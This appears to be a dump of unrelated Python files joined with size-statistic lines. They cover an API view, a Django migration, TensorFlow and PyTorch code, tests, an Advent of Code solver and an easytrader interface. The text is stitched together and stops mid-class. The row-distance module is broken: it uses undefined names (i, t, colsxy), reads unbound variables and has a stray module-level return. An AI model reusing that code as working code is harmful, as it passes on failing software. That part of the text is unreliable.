class BuildDetailsAPIView(APIView):
    """API endpoint exposing one build plus derived details:
    jobs, test failures, test changes, parent builds, events, viewers."""

    post_parser = RequestParser()
    post_parser.add_argument('priority', choices=BuildPriority._member_names_)

    def get(self, build_id):
        # Eager-load the relations the serializer touches to avoid N+1 queries.
        build = Build.query.options(
            joinedload('project', innerjoin=True),
            joinedload('author'),
            joinedload('source').joinedload('revision'),
            subqueryload_all('stats'),
        ).get(build_id)
        if build is None:
            return '', 404
        try:
            # Baseline for comparison: the most recent finished, unpatched
            # build of the same project that predates this one.
            most_recent_run = Build.query.filter(
                Build.project == build.project,
                Build.date_created < build.date_created,
                Build.status == Status.finished,
                Build.id != build.id,
                Source.patch_id == None,  # NOQA
            ).join(
                Source, Build.source_id == Source.id,
            ).options(
                contains_eager('source').joinedload('revision'),
                joinedload('author'),
            ).order_by(Build.date_created.desc())[0]
        except IndexError:
            most_recent_run = None
        jobs = list(Job.query.filter(
            Job.build_id == build.id,
        ))
        # identify failures
        test_failures = TestCase.query.options(
            joinedload('job', innerjoin=True),
        ).filter(
            TestCase.job_id.in_([j.id for j in jobs]),
            TestCase.result == Result.failed,
        ).order_by(TestCase.name.asc())
        num_test_failures = test_failures.count()
        # Serialize at most 25 failures; the full count is still reported.
        test_failures = test_failures[:25]
        # NOTE(review): failures_by_job is built but never read below.
        failures_by_job = defaultdict(list)
        for failure in test_failures:
            failures_by_job[failure.job].append(failure)
        failure_origins = find_failure_origins(
            build, test_failures)
        for test_failure in test_failures:
            test_failure.origin = failure_origins.get(test_failure)
        # identify added/removed tests (only meaningful when finished and
        # a baseline build exists to diff against)
        if most_recent_run and build.status == Status.finished:
            changed_tests = find_changed_tests(build, most_recent_run)
        else:
            changed_tests = []
        seen_by = list(User.query.join(
            BuildSeen, BuildSeen.user_id == User.id,
        ).filter(
            BuildSeen.build_id == build.id,
        ))
        extended_serializers = {
            TestCase: TestCaseWithOriginCrumbler(),
        }
        event_list = list(Event.query.filter(
            Event.item_id == build.id,
        ).order_by(Event.date_created.desc()))
        context = self.serialize(build)
        context.update({
            'jobs': jobs,
            'seenBy': seen_by,
            'events': event_list,
            'failures': get_failure_reasons(build),
            'testFailures': {
                'total': num_test_failures,
                'tests': self.serialize(test_failures, extended_serializers),
            },
            'testChanges': self.serialize(changed_tests, extended_serializers),
            'parents': self.serialize(get_parents_last_builds(build)),
        })
        return self.respond(context)

    def post(self, build_id):
        """Update mutable build attributes (currently only `priority`)."""
        build = Build.query.options(
            joinedload('project', innerjoin=True),
            joinedload('author'),
            joinedload('source').joinedload('revision'),
        ).get(build_id)
        if build is None:
            return '', 404
        args = self.post_parser.parse_args()
        if args.priority is not None:
            build.priority = BuildPriority[args.priority]
        db.session.add(build)
        context = self.serialize(build)
        return self.respond(context, serialize=False)
| 8,328 | 2,535 |
import unittest
from Monitor import five_or_greater
class MockProject(object):
    """Minimal stand-in for a project object, exposing only the two
    attributes that five_or_greater() reads."""

    def __init__(self, message_count, keyword_counts):
        # Total number of messages observed for the project.
        self.message_count = message_count
        # Mapping of keyword -> occurrence count.
        self.keyword_counts = keyword_counts
class TestOneOrGreater(unittest.TestCase):
    """Tests for Monitor.five_or_greater with a mix of keyword counts."""

    def test_some_above_some_below(self):
        """Keywords below the threshold are dropped; the kept keywords
        come back in their original order."""
        total = 1000
        sample_dataset = {
            "keep1": 1000,
            "keep2": 800,
            "not1": 5,
            "keep3": 100,
            "not2": 1,
        }
        project = MockProject(total, sample_dataset)
        # Fix: use assertEqual -- assertEquals is a deprecated alias
        # (removed in Python 3.12).
        self.assertEqual(five_or_greater(project), ["keep1", "keep2", "keep3"])
# -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2018-05-20 16:32
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial schema: current masternode state plus an append-only history."""

    initial = True

    dependencies = [
    ]

    operations = [
        # Current snapshot of each masternode, keyed by txid.
        migrations.CreateModel(
            name='Masternode',
            fields=[
                ('txid', models.CharField(editable=False, max_length=64, primary_key=True, serialize=False)),
                ('address', models.CharField(max_length=64)),
                ('inserted_at', models.DateTimeField(auto_now_add=True)),
                ('last_seen_at', models.DateTimeField(auto_now_add=True)),
                ('status', models.CharField(max_length=30)),
                ('version', models.IntegerField()),
            ],
        ),
        # Historical status/version records per txid.
        # NOTE(review): txid here is a plain CharField, not a ForeignKey
        # to Masternode -- confirm that is intentional.
        migrations.CreateModel(
            name='MasternodeHistory',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('txid', models.CharField(max_length=64)),
                ('inserted_at', models.DateTimeField(auto_now_add=True)),
                ('status', models.CharField(max_length=30)),
                ('version', models.IntegerField()),
            ],
        ),
    ]
| 1,293 | 372 |
# coding: utf8
__author__ = 'baocaixiong'
__all__ = ['TmcClient']
from tmcclient import TmcClient
| 100 | 40 |
# Smoke-test placeholder: simply confirms the script was executed.
print("test.py")
| 17 | 8 |
import numpy as np
import tensorflow as tf
from tensorflow import gfile
from PIL import Image
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelBinarizer
import multiprocessing
import sys
import os
def resize(img, shape):
    """Resize *img* to *shape* via TensorFlow's image resizing op."""
    resized = tf.image.resize(img, shape)
    return resized
def load_mnist():
    """Placeholder for MNIST loading; not implemented yet."""
    return None
def preprocess_input(path):
    """Load one image from *path* as a single-element tf.data dataset.

    The image is scaled to [0, 1]; the label is a dummy 10-way zero vector.
    """
    with Image.open(path) as img:
        img = np.array(img, np.float32)
        img = img/255
        # Wrap the single image (and dummy label) as a batch-of-1 dataset.
        img = create_dataset(np.array([img]), np.array([[0]*10], np.float32), 1)
    return img
def create_dataset(images, labels, batch_size):
    """Build a shuffled, batched, prefetching tf.data pipeline from arrays."""
    dataset = tf.data.Dataset.from_tensor_slices((images, labels))
    # Shuffle buffer covering the whole dataset gives a uniform shuffle.
    dataset = dataset.shuffle(len(images))
    dataset = dataset.batch(batch_size)
    # Prefetch one batch so consumers never wait on the input pipeline.
    dataset = dataset.prefetch(1)
    return dataset
def load_data(train_path, batch_size=1, test_path=None):
    """Build (train, val, test) tf.data datasets from image folder trees.

    If *test_path* is omitted, 4% of the training data is held out and
    split evenly into validation and test sets.

    NOTE(review): when *test_path* IS given, validation data is carved out
    of the external test set -- confirm that is intended.
    """
    train_images, train_labels = get_data(train_path)
    if test_path:
        test_images, test_labels = get_data(test_path)
    else:
        train_images, test_images, train_labels, test_labels = train_test_split(train_images, train_labels, shuffle=True, test_size=0.04)
    val_images, test_images, val_labels, test_labels = train_test_split(test_images, test_labels, shuffle=False, test_size=0.5)
    print(val_images[1].shape)
    print(len(val_labels))
    train = create_dataset(train_images, train_labels, batch_size)
    # Validation is served as one single batch.
    val = create_dataset(val_images, val_labels, len(val_images))
    test = create_dataset(test_images, test_labels, batch_size)
    # Drop the raw arrays so only the datasets keep memory alive.
    del train_images, train_labels, test_images, test_labels, val_images, val_labels
    return train, val, test
def get_data(data_path):
    """Load an image-classification folder tree: data_path/<class>/<image>.

    Returns (images, labels): float32 images scaled to [0, 1] and
    one-hot (binarized) float32 labels.
    """
    images, labels = [], []
    # classes = os.listdir(path)
    # cur_dir = os.getcwd()
    # os.chdir(path)
    for cls in os.listdir(data_path):
        path = os.path.join(data_path, cls)
        for img_path in os.listdir(path):
            try:
                with Image.open(os.path.join(path, img_path)) as img:
                    images.append(np.array(img))
                    labels.append(cls)
            except Exception as e:
                # Best-effort: silently skip unreadable/corrupt files.
                pass
    images = [image/255 for image in images]
    encoder = LabelBinarizer()
    encoder.fit(labels)
    labels = encoder.transform(labels)
    labels = labels.astype(np.float32)
    # os.chdir(cur_dir)
    print(len(images))
    print(len(labels))
    return np.array(images, np.float32), np.array(labels)
def get_batch():
    """Placeholder for manual batch retrieval; not implemented."""
    return None
def plot():
    """Placeholder for plotting; not implemented."""
    return None
def stack_plot():
    """Placeholder for stacked plotting; not implemented."""
    return None
if __name__ == '__main__':
    # load_data returns (train, val, test) datasets; the previous
    # `images, labels, _` unpacking used misleading names for them.
    train, val, test = load_data("data/notMNIST_small")
from __future__ import print_function, division
import sys
sys.dont_write_bytecode = True
"""
# Rows
"""
from lib import *
class Row:
    """A row of table `t`; caches pairwise distances between rows.

    NOTE(review): several methods reference names that are not in scope
    (`i` inside dist/furthest, `t` inside furthest/knn). These look like
    latent bugs; flagged inline -- confirm against upstream.
    """
    n = -1  # class-level counter; each new instance gets the next id

    def __init__(i, t):
        # This codebase uses `i`/`j` in place of the conventional `self`.
        Row.n = i.n = Row.n + 1
        i.t, i.dists = t, {}

    def dist(j, k):
        # Distance between rows j and k, cached symmetrically by id pair.
        if j.n == k.n: return 0
        if j.n > k.n: return k.dist(j)
        key = (j.n, k.n)
        if not key in j.dists:
            j.dists[key] = dist(i.t, j, k)  # BUG? `i` is undefined here -- presumably j.t
        return j.dists[key]

    def furthest(j, lst=None, best=-1, better=gt):
        # NOTE(review): returns `best` (a number) even though `out` (a Row)
        # is tracked; and `t`/`i` are undefined -- presumably j.t. Confirm.
        lst = lst or t.rows
        out = j
        for k in lst:
            tmp = dist(i.t, j, k)
            if tmp and better(tmp, best):
                out, best = k, tmp
        return best

    def closest(j, lst=None):
        # Nearest-neighbour search via furthest() with inverted comparison.
        return j.furthest(lst, best=1e32, better=lt)

    def knn(i, k=1, lst=None):
        # Map each row in lst to its k nearest (distance, row) pairs.
        # NOTE(review): `t` is undefined (presumably i.t), and the outer
        # `for r2 in lst` loop is redundant with the inner comprehension.
        lst = lst or t.rows
        out = {}
        for r1 in lst:
            for r2 in lst:
                all = [(dist(i.t, r1, r2), r2) for r2 in lst]
                out[r1] = sorted(all)[:k]
        return out
return out
def dist(t, j, k):
    """Normalized distance between rows j and k over table t's independent
    columns (symbolic mismatch count + squared numeric differences).

    NOTE(review): the symbolic loop calls `colsxy` (undefined; the local
    helper is `colxy`) and reads `x`/`y` without ever unpacking them --
    that branch cannot run as written. Confirm against upstream.
    """
    def colxy(cols, xs, ys):
        # Yield (column, x-value, y-value), skipping pairs where both unknown.
        for col in cols:
            x = xs[col.pos]
            y = ys[col.pos]
            if x == "?" and y == "?": continue
            yield col, x, y

    def far(col, x, y):
        # One value missing: assume the value furthest from the known one.
        y = col.norm(y)
        x = 0 if y > 0.5 else 1
        return x, y
    #---------
    n = all = 0
    for col in colsxy(t.indep.syms, j, k):  # BUG? should be colxy(...) with unpacking
        if x == "?" or y == "?":  # BUG? x and y are not bound in this loop
            n += 1
            all += 1
        else:
            inc = 0 if x == y else 1
            n += 1
            all += inc
    for col, x, y in colxy(t.indep.nums, j, k):
        if x == "?": x, y = far(col, x, y)
        elif y == "?": y, x = far(col, y, x)
        else: x, y = col.norm(x), col.norm(y)
        n += 1
        all += (x - y)**2
    # Root-mean-style aggregate over the counted columns.
    return all**0.5 / n**0.5
| 1,570 | 721 |
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 9 11:17:24 2018

@author: nce3xin

Hyper-parameters and feature-processing switches for training.
"""
seed_num = 1           # RNG seed for reproducibility
learning_rate = 1e-3
#epochs=109
#epochs=90
epochs = 20            # number of training epochs
batch_size = 16
log_interval = 1       # log every N batches
no_cuda = False        # set True to force CPU training
MODEL = 'LSTM'         # model architecture selector
cnn_out_dims = 25      # output dimension of the CNN mapping
CNN_mapping = False    # enable CNN feature mapping
# Feature-scaling switches; presumably mutually exclusive -- confirm usage.
normalization = False
standard_scale = False
min_max_scaler = False
"""Definition of an ElkM1 Custom Value"""
from .const import Max, TextDescriptions
from .elements import Element, Elements
from .message import add_message_handler, cp_encode, cw_encode
class Setting(Element):
    """Class representing a custom value."""

    def __init__(self, index, elk):
        super().__init__(index, elk)
        # Format code used when encoding writes; updated from CR messages.
        self.value_format = 0
        # Last known value; None until the first report from the panel.
        self.value = None

    def set(self, value):
        """(Helper) Set custom value."""
        self._elk.send(cw_encode(self._index, value, self.value_format))
class Settings(Elements):
    """Handling for multiple custom values"""

    def __init__(self, elk):
        super().__init__(elk, Setting, Max.SETTINGS.value)
        # CR messages report a custom value; route them to _cr_handler.
        add_message_handler('CR', self._cr_handler)

    def sync(self):
        """Retrieve custom values from ElkM1"""
        # NOTE(review): uses `self.elk` while Setting uses `self._elk` --
        # confirm which attribute the Elements base class actually defines.
        self.elk.send(cp_encode())
        self.get_descriptions(TextDescriptions.SETTING.value)

    def _cr_handler(self, index, value, value_format):
        # Cache the reported value and its format on the matching element.
        custom_value = self.elements[index]
        custom_value.value_format = value_format
        custom_value.value = value
| 1,091 | 337 |
from rxbp.indexed.impl.indexedflowableimpl import IndexedFlowableImpl
from rxbp.indexed.mixins.indexedflowablemixin import IndexedFlowableMixin
def init_indexed_flowable(
        underlying: IndexedFlowableMixin,
):
    """Wrap *underlying* in the concrete IndexedFlowableImpl."""
    return IndexedFlowableImpl(underlying=underlying)
| 286 | 93 |
"""Top-level package for COSC525-Project2."""
from .neuron import *
from .fully_connected_layer import *
from .convolutional_layer import *
from .max_pooling_layer import *
from .flatten_layer import *
from .neural_network import *
from .data_generator import *
from .tensor_files import *
| 291 | 92 |
import math
from pathlib import Path
import numpy as np
import torch
from torch import nn
import torch.nn.functional as F
from torch.autograd import Variable
from torchvision import models
from PIL import Image
from lib.default_box import dbox_params
from lib.visualize import Visualizer
from common import numpy2pil
def set_batch_norm_eval(model):
    """Freeze every BatchNorm2d layer in *model*: switch it to eval mode
    and stop gradient updates for its affine parameters."""
    frozen = 0
    still_training = 0
    for layer in model.modules():
        if not isinstance(layer, torch.nn.modules.batchnorm.BatchNorm2d):
            continue
        if layer.training:
            still_training += 1
        layer.eval()
        frozen += 1
        layer.weight.requires_grad = False
        layer.bias.requires_grad = False
    print('{} BN modules are set to eval'.format(frozen))
class Model(nn.Module):
    """Single-shot 3D box detector on a ResNet-34 backbone.

    For each of the 4 default-box configurations the head emits a
    (num_classes + 7)-channel map: class-assignment scores plus
    x, y, length, width, z, height and rotation regressions.
    """

    def __init__(self):
        super().__init__()
        self.num_classes = 10
        # Channels per default box: class scores + 7 geometry values.
        # ("outoput" typo kept -- renaming would break external callers.)
        self.outoput_channel = self.num_classes + 7
        resnet34 = models.resnet34(pretrained=True)
        # Backbone: ResNet-34 through layer3.
        self.resnet34_main = nn.Sequential(
            resnet34.conv1,
            resnet34.bn1,
            resnet34.relu,
            resnet34.maxpool,
            resnet34.layer1,
            resnet34.layer2,
            resnet34.layer3
        )
        # Downsampling branch 1: reuse ResNet layer4.
        self.conv_ex1 = resnet34.layer4
        # Downsampling branch 2: bottleneck then stride-2 conv.
        self.conv_ex2 = nn.Sequential(
            nn.Conv2d(512, 256, kernel_size=1, padding=0, stride=1),
            nn.BatchNorm2d(256),
            nn.ReLU(inplace=True),
            nn.Conv2d(256, 512, kernel_size=3, padding=1, stride=2),
            nn.BatchNorm2d(512),
            nn.ReLU(inplace=True)
        )
        # Upsampling branch back to the ex1 resolution for feature fusion.
        self.conv_up2 = nn.Sequential(
            nn.ConvTranspose2d(512, 256, kernel_size=3, padding=1, stride=1),
            nn.BatchNorm2d(256),
            nn.ReLU(inplace=True),
            nn.ConvTranspose2d(256, 512, kernel_size=2, padding=0, stride=2),
            nn.BatchNorm2d(512),
            nn.ReLU(inplace=True)
        )
        # self.conv_ex3 = nn.Sequential(nn.Conv2d(512, 128, kernel_size=1, padding=0, stride=1),
        #                               nn.ReLU(inplace=True),
        #                               nn.Conv2d(128, 256, kernel_size=3, padding=1, stride=2),
        #                               nn.ReLU(inplace=True)
        #                               )
        # self.ex0_intermediate = nn.Conv2d(256, 4 * self.outoput_channel, kernel_size=3, padding=1, stride=1)
        # Prediction head on the fused (1024-channel) ex1 feature map.
        self.ex1_intermediate = nn.Sequential(
            nn.Conv2d(1024, 512, kernel_size=3, padding=1, stride=1),
            nn.Softplus(),
            nn.Conv2d(512, 4 * self.outoput_channel, kernel_size=1, padding=0, stride=1)
        )
        # self.ex2_intermediate = nn.Conv2d(512, 4 * self.outoput_channel, kernel_size=3, padding=1, stride=1)
        # self.ex3_intermediate = nn.Conv2d(256, 32, kernel_size=3, padding=1, stride=1)

    @staticmethod
    def header(h, img_size):
        """Decode raw head output `h` into absolute box parameters.

        `h` is reshaped upstream to (batch, 4 dboxes, num_classes + 7, S, S)
        with S = h.shape[-1]. Class scores are softmaxed; geometry offsets
        are converted to absolute image coordinates using the default-box
        parameters. Requires CUDA (constants are moved via .cuda()).
        """
        batch_size = len(h)
        # Stride of this feature map in input pixels, and cell-center grid.
        step = img_size / h.shape[-1]
        points = np.arange(step / 2 - 0.5, img_size, step, dtype=np.float32)
        assignment, x, y, length, width, z, height, rotate = torch.split(
            h, [10, 1, 1, 1, 1, 1, 1, 1], dim=2)
        # Broadcast the cell-center coordinates over batch and dbox dims.
        x_points = np.tile(points.reshape(1, 1, 1, h.shape[-1], 1), (batch_size, len(dbox_params), 1, 1, h.shape[-1]))
        y_points = np.tile(points.reshape(1, 1, 1, 1, h.shape[-1]), (batch_size, len(dbox_params), 1, h.shape[-1], 1))
        # Per-dbox priors: rotation offsets and size scale factors.
        rotate_vars = dbox_params['rotate_vars'].values
        rotate_vars = np.tile(rotate_vars.reshape(1, len(rotate_vars), 1, 1, 1),
                              (batch_size, 1, 1, h.shape[-1], h.shape[-1]))
        length_shifts = dbox_params['length_shifts'].values
        length_shifts = np.tile(length_shifts.reshape(1, len(length_shifts), 1, 1, 1),
                                (batch_size, 1, 1, h.shape[-1], h.shape[-1]))
        width_shifts = dbox_params['width_shifts'].values
        width_shifts = np.tile(width_shifts.reshape(1, len(width_shifts), 1, 1, 1),
                               (batch_size, 1, 1, h.shape[-1], h.shape[-1]))
        height_shifts = dbox_params['height_shifts'].values
        height_shifts = np.tile(height_shifts.reshape(1, len(height_shifts), 1, 1, 1),
                                (batch_size, 1, 1, h.shape[-1], h.shape[-1]))
        assignment = torch.softmax(assignment, dim=2)  # [batch_size, dbox, channel, x, y]
        # tanh keeps the predicted center within one cell of its anchor.
        x_abs = torch.tanh(x) * step + torch.from_numpy(x_points).cuda()
        y_abs = torch.tanh(y) * step + torch.from_numpy(y_points).cuda()
        # 1010.0: dataset-specific z offset -- TODO confirm its origin.
        z_abs = z + 1010.0
        length_abs = torch.exp(length * 0.1 + math.log2(step) / 1.5) * torch.from_numpy(length_shifts).cuda() + 1
        width_abs = torch.exp(width * 0.1 + math.log2(step) / 1.5) * torch.from_numpy(width_shifts).cuda() + 1
        height_abs = torch.exp(height * 0.1 + math.log2(step) / 1.5) * torch.from_numpy(height_shifts).cuda() + 1
        rotate_abs = torch.atan(rotate) + torch.from_numpy(rotate_vars).cuda()
        return torch.cat([assignment, x_abs, y_abs, length_abs, width_abs, z_abs, height_abs, rotate_abs], dim=2)

    def forward_main(self, x):
        """Run the backbone + fusion branches; returns raw head maps."""
        list_output = list()
        main_out = self.resnet34_main.forward(x)
        ex1_down = F.relu(self.conv_ex1(main_out))
        ex2_down = self.conv_ex2(ex1_down)
        ex1_up = self.conv_up2(ex2_down)
        # Fuse the down- and up-sampled features channel-wise (512+512).
        ex1_out = torch.cat([ex1_down, ex1_up], 1)
        ex1_branch = self.ex1_intermediate(ex1_out)  # 24x24
        list_output.append(ex1_branch)
        return list_output

    def forward(self, x):
        """Full forward pass: raw head maps decoded into absolute boxes."""
        list_output = list()
        list_main = self.forward_main(x)
        for out in list_main:
            size = out.shape[-1]
            h = self.header(out.reshape(-1, 4, self.outoput_channel, size, size), img_size=x.shape[-1])
            list_output.append(h.reshape(-1, 4 * self.outoput_channel, size, size))
        return list_output
def build_model():
    """Construct the detector and move it to the GPU (CUDA required)."""
    model = Model()
    model.cuda()
    return model
if __name__ == '__main__':
    # Smoke-test the model at two input resolutions and dump visualizations
    # of the (untrained) predicted boxes into _debug/.
    dir_debug = Path('_debug')
    dir_debug.mkdir(exist_ok=True)
    model = build_model()
    print(model)
    viz = Visualizer('colors.json')
    # 768 x 768
    in_arr1 = np.zeros((2, 3, 768, 768), dtype=np.float32)
    in_tensor1 = torch.from_numpy(in_arr1)
    out_vars1 = model.forward(in_tensor1.cuda())
    [print(out_var.shape) for out_var in out_vars1]
    # Split each output tensor per batch element for visualization.
    out_var_numpy1 = [tensor.cpu().data.numpy() for tensor in out_vars1]
    out_var_numpy_batch1 = [[tensor[b, :, :, :] for tensor in out_var_numpy1] for b in range(2)]
    img = viz.draw_predicted_boxes(out_var_numpy_batch1[0], dbox_params, img_size=in_arr1.shape[-1])
    numpy2pil(img).save(dir_debug / 'sample_1-0.png')
    img = viz.draw_predicted_boxes(out_var_numpy_batch1[1], dbox_params, img_size=in_arr1.shape[-1])
    numpy2pil(img).save(dir_debug / 'sample_1-1.png')
    # 1024 x 1024
    in_arr2 = np.zeros((2, 3, 1024, 1024), dtype=np.float32)
    in_tensor2 = torch.from_numpy(in_arr2)
    out_vars2 = model.forward(in_tensor2.cuda())
    [print(out_var.shape) for out_var in out_vars2]
    out_var_numpy2 = [tensor.cpu().data.numpy() for tensor in out_vars2]
    out_var_numpy_batch2 = [[tensor[b, :, :, :] for tensor in out_var_numpy2] for b in range(2)]
    img = viz.draw_predicted_boxes(out_var_numpy_batch2[0], dbox_params, img_size=in_arr2.shape[-1])
    numpy2pil(img).save(dir_debug / 'sample_2-0.png')
    img = viz.draw_predicted_boxes(out_var_numpy_batch2[1], dbox_params, img_size=in_arr2.shape[-1])
    numpy2pil(img).save(dir_debug / 'sample_2-1.png')
| 7,581 | 3,028 |
import numpy as np
import pytest, os
from numpy.testing import assert_array_equal
from ReconstructOrder.datastructures.physical_data import PhysicalData
def test_basic_constructor_nparray():
    """
    test assignment using numpy arrays
    """
    phys = PhysicalData()
    attrs = ['I_trans', 'polarization', 'retard', 'depolarization',
             'azimuth', 'azimuth_degree', 'azimuth_vector']
    # Assign each attribute a distinct constant array, then read it back.
    for factor, attr in enumerate(attrs, start=1):
        setattr(phys, attr, factor * np.ones((512, 512)))
    for factor, attr in enumerate(attrs, start=1):
        assert_array_equal(getattr(phys, attr), factor * np.ones((512, 512)))
def test_basic_constructor_memap(setup_temp_data):
    """
    test assignment using memory mapped files
    """
    mm = setup_temp_data
    phys = PhysicalData()
    attrs = ['I_trans', 'polarization', 'retard', 'depolarization',
             'azimuth', 'azimuth_degree', 'azimuth_vector']
    # Assign scaled copies of the memmap, then verify round-trip equality.
    for factor, attr in enumerate(attrs, start=1):
        setattr(phys, attr, factor * mm)
    for factor, attr in enumerate(attrs, start=1):
        assert_array_equal(getattr(phys, attr), factor * mm)
def test_instances():
    """
    test instance attributes

    Two fresh instances must not compare equal, and assigning different
    values to the same attribute must keep the instances independent.
    """
    phs1 = PhysicalData()
    phs2 = PhysicalData()
    with pytest.raises(AssertionError):
        assert (phs1 == phs2)
    with pytest.raises(AssertionError):
        phs1.retard = 1
        phs2.retard = 2
        assert (phs1.retard == phs2.retard)
def test_private_access(setup_physical_data):
    """
    test that private attributes are not accessible
    """
    phys = setup_physical_data
    with pytest.raises(AttributeError):
        print(phys.__I_trans)
        # NOTE(review): unreachable -- the line above raises first, so
        # __retard is never actually exercised by this test.
        print(phys.__retard)
# ==== Attribute assignment ==========
def test_assignment(setup_physical_data):
    """
    test exception handling of improper assignment

    PhysicalData is expected to reject attributes it does not declare.
    """
    phys = setup_physical_data
    with pytest.raises(TypeError):
        phys.incorrect_attribute = 1
#!/bin/python
"""Day 14: Space Stoichiometry.
Handle chemical reactions, converting ORE to FUEL.
"""
import collections
import math
import typer
from typing import Dict, List, Set, Tuple
import data
from lib import aoc
SAMPLE = data.D14
TRILLION = int(1e12)
class Reaction:
    """Wrapper around a single reaction."""

    def __init__(self, product: Tuple[int, str], reactants: List[Tuple[int, str]]):
        self.product_amt, self.product = product
        self._reactants = reactants
        # Set of reactant names, for quick dependency checks.
        self.reactants = {name for _, name in self._reactants}

    def needed(self, count: int) -> Tuple[List[Tuple[int, str]], int]:
        """Return (reactants required, product actually produced) for
        making at least `count` units of the product.

        The reaction only runs in whole multiples, so production may
        overshoot `count`.
        """
        runs = -(-count // self.product_amt)  # ceiling division
        scaled = [(runs * amt, name) for amt, name in self._reactants]
        return scaled, runs * self.product_amt
class Day14(aoc.Challenge):
    """Solver for AoC 2019 day 14: ORE -> FUEL stoichiometry."""

    TESTS = (
        aoc.TestCase(inputs=SAMPLE[0], part=1, want=165),
        aoc.TestCase(inputs=SAMPLE[1], part=1, want=13312),
        aoc.TestCase(inputs=SAMPLE[2], part=1, want=180697),
        aoc.TestCase(inputs=SAMPLE[3], part=1, want=2210736),
        aoc.TestCase(inputs=SAMPLE[1], part=2, want=82892753),
        aoc.TestCase(inputs=SAMPLE[2], part=2, want=5586022),
        aoc.TestCase(inputs=SAMPLE[3], part=2, want=460664),
    )

    def part1(self, reactions: Dict[str, Reaction]) -> int:
        """Calculate how much ore is needed for 1 unit of fuel."""
        return self.ore_per_fuel(reactions, 1)

    def part2(self, reactions: Dict[str, Reaction]) -> int:
        """Determine how much fuel can be made with 1e12 ore.

        Use the `ore_per_fuel()` function to binary search from 0 to 2e12 / ore_per_fuel(1).
        """
        # Upper bound: fuel-per-ore is at best roughly linear, so double it.
        low, high = 1, 2 * TRILLION // self.ore_per_fuel(reactions, 1)
        while (high - low) > 1:
            mid = (low + high) // 2
            ore = self.ore_per_fuel(reactions, mid)
            if ore == TRILLION:
                # Unlikely to occur but it doesn't hurt to be safe.
                return mid
            elif ore > TRILLION:
                high = mid
            else:
                low = mid
        return low

    def part2_via_reactions(self, reactions: Dict[str, Reaction]) -> int:
        """Solve part2 by actually running reactions until we run out of ore."""
        # Track inventory of products as we run reactions and have leftovers.
        inventory = {product: 0 for product in reactions}
        inventory['ORE'] = TRILLION

        def react(product: str, amount: int, inv: Dict[str, int]) -> bool:
            """Run a reaction to produce `amount` of `product` using mutatable inventory `inv`.

            Returns a bool indicating if we can actually pull off the reaction. On False, `inv`
            is a bit trashed.
            """
            def _react(product, amount):
                """Closure on `inv` to avoid passing it around."""
                # If we do not have enough ore and are trying to produce some, this reaction fails.
                if product == 'ORE':
                    return False
                needs, gets = reactions[product].needed(amount)
                # Produce all the needed reactants to run the reaction.
                # Some reactants might use up others to be formed, hence the loop.
                while any(inv[reactant] < uses for uses, reactant in needs):
                    for uses, reactant in needs:
                        if inv[reactant] >= uses:
                            continue
                        # We need more of this reactant. Try to produce it. Mutates `inv`.
                        short = uses - inv[reactant]
                        if not _react(reactant, short):
                            return False
                # Mutate `inv` and run the reaction. Use up reactants, produce product.
                for uses, reactant in needs:
                    inv[reactant] -= uses
                inv[product] += gets
                return True
            return _react(product, amount)

        # Try to produce fuel in large quantities at first.
        # Reduce reaction size as they fail.
        volume = TRILLION // self.part1(reactions)
        while True:
            # Since failed reactions mutate the inventory, first see if they will work
            # on a copy. Then actually update the inventory.
            if react('FUEL', volume, inventory.copy()):
                react('FUEL', volume, inventory)
            else:
                # Failed to produce 1 fuel. We are at the end.
                if volume == 1:
                    return inventory['FUEL']
                volume = volume // 2 or 1

    def ore_per_fuel(self, reactions: Dict[str, Reaction], fuel: int) -> int:
        """Calculate how much ore is required to produce `fuel` units of fuel."""
        _dependencies = {'ORE': set()}  # type: Dict[str, Set[str]]

        def dependencies(product: str) -> Set[str]:
            """Compute *all* reactants (recursively) involved in producing `product`."""
            # Cache results for dynamic programming.
            if product not in _dependencies:
                # Collect all reactants ... recursively.
                deps = set(reactions[product].reactants)
                for reactant in list(deps):
                    deps.update(dependencies(reactant))
                _dependencies[product] = deps
            return _dependencies[product]

        # Iteratively resolve all products to the reactants needed to produce them.
        # Stop when we get down to just ore.
        want = collections.defaultdict(int)
        want['FUEL'] = fuel
        while list(want.keys()) != ['ORE']:
            # Find all products which are not also reactants of other products.
            # If a product is also a reactant, we may need more of it so it cannot yet be solved.
            products = {r for r in want.keys() if not any(r in dependencies(other) for other in want)}
            for product in products:
                # Add all the required reactants to the want list and remove the product.
                for amount, reactant in reactions[product].needed(want[product])[0]:
                    want[reactant] += amount
                del want[product]
        return want['ORE']

    def parse_input(self, puzzle_input: str) -> Dict[str, Reaction]:
        """Build a dictionary of material produced to Reaction."""
        reactions = {}  # type: Dict[str, Reaction]

        def to_tuple(pair: str) -> Tuple[int, str]:
            # "7 A" -> (7, "A")
            a, b = pair.split()
            return (int(a), b)

        for line in puzzle_input.split('\n'):
            reactants, product = line.split('=>')
            reaction = Reaction(
                to_tuple(product),
                [to_tuple(p) for p in reactants.split(', ')],
            )
            reactions[reaction.product] = reaction
        return reactions
if __name__ == '__main__':
    # typer provides the CLI wrapper around the challenge runner.
    typer.run(Day14().run)

# vim:ts=2:sw=2:expandtab
| 6,349 | 2,041 |
#!/usr/bin/env python
import sys
from pynauty import autgrp, Version
import pytest
# List of graphs for testing
#
# Structure:
# [[name, Graph, numorbit, grpsize, generators]]
#
# numorbit, grpsize, generators was calculated by dreadnut
#
def test_autgrp(graph):
    """Check autgrp() against precomputed dreadnaut results for one graph.

    The `graph` fixture supplies (name, Graph, numorbit, grpsize, generators).
    """
    gname, g, numorbit, grpsize, gens = graph
    print(Version())
    print('%-17s ...' % gname, end=' ')
    sys.stdout.flush()
    # o2 and orbits are returned by autgrp but not checked by this test.
    generators, order, o2, orbits, orbit_no = autgrp(g)
    assert generators == gens and orbit_no == numorbit and order == grpsize
| 530 | 189 |
import abc
import requests
import time
import json
from easytrader.utils.misc import file2dict
class IRemoteTrader(abc.ABC):
    """Abstract interface for a remote trading backend."""

    @abc.abstractmethod
    def prepare(
        self,
        config_path=None,
        user=None,
        password=None,
        token=None,
        address=None,
    ):
        """Configure credentials/endpoint, either from a config file
        (config_path) or from the individual keyword arguments."""
        pass

    @property
    @abc.abstractmethod
    def balance(self):
        """Current account balance."""
        pass

    @property
    @abc.abstractmethod
